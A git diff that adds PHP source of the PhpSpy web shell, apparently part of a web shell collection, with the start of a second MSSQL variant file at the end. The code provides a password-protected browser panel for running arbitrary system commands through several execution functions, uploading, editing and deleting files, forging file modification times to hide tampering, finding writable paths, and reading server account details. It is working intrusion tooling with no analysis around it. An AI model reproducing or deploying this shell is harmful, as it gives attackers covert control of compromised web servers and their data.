+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=view_writable;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+function getsize(getdir,dir){
+	$('getsize').getdir.value=getdir;
+	$('getsize').dir.value=dir;
+	$('getsize').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div></form>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj) && is_array($obj->Drives)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr><tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable == 'dir') {
+		$dirdata = GetWDirList($nowpath);
+		$filedata = array();
+	} elseif ($view_writable == 'file') {
+		$dirdata = array();
+		$filedata = GetWFileList($nowpath);
+	} else {
+		// Ŀ¼Áбí
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			if($getdir && $getdir == $dirdb['server_link']) {
+				$attachsize = dirsize($dirdb['server_link']);
+				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+			} else {
+				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+			}
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap>&nbsp;</td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>'.$attachsize.'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete <'.$dirdb['filename'].'>? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+	
+	goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+	goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2009 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+
+function dirsize($dir) { 
+	$dh = @opendir($dir);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $dir.'/'.$file;
+			if (@is_dir($path)) {
+				$size += dirsize($path);
+			} else {
+				$size += @filesize($path);
+			}
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// »ñµÃÎļþÀ©Õ¹Ãû
+function getextension($filename) {
+	$pathinfo = pathinfo($filename);
+	return $pathinfo['extension'];
+}
+
+function GetWDirList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function GetWFileList($dir){
+	global $filedata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getextension($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetWFileList($f);
+			} elseif($file!='.' && $file!='..' && is_file($f)){
+				if (is_writable($f)) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$filedata[$j]['client_link']=ue($f);
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			if ($arg['nokey']) {
+				foreach ($arg['option'] as $value) {
+					if ($arg['selected']==$value) {
+						p("<option value=\"$value\" selected>$value</option>");
+					} else {
+						p("<option value=\"$value\">$value</option>");
+					}
+				}
+			} else {
+				foreach ($arg['option'] as $key=>$value) {
+					if ($arg['selected']==$key) {
+						p("<option value=\"$key\" selected>$value</option>");
+					} else {
+						p("<option value=\"$key\">$value</option>");
+					}
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	global $self;
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $self, $nowpath;
+	p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// µ÷ÊÔº¯Êý
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/2009mssql.php b/php/phpspy/2009mssql.php
new file mode 100644
index 0000000..d28a844
--- /dev/null
+++ b/php/phpspy/2009mssql.php
@@ -0,0 +1,2723 @@
+<?php
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
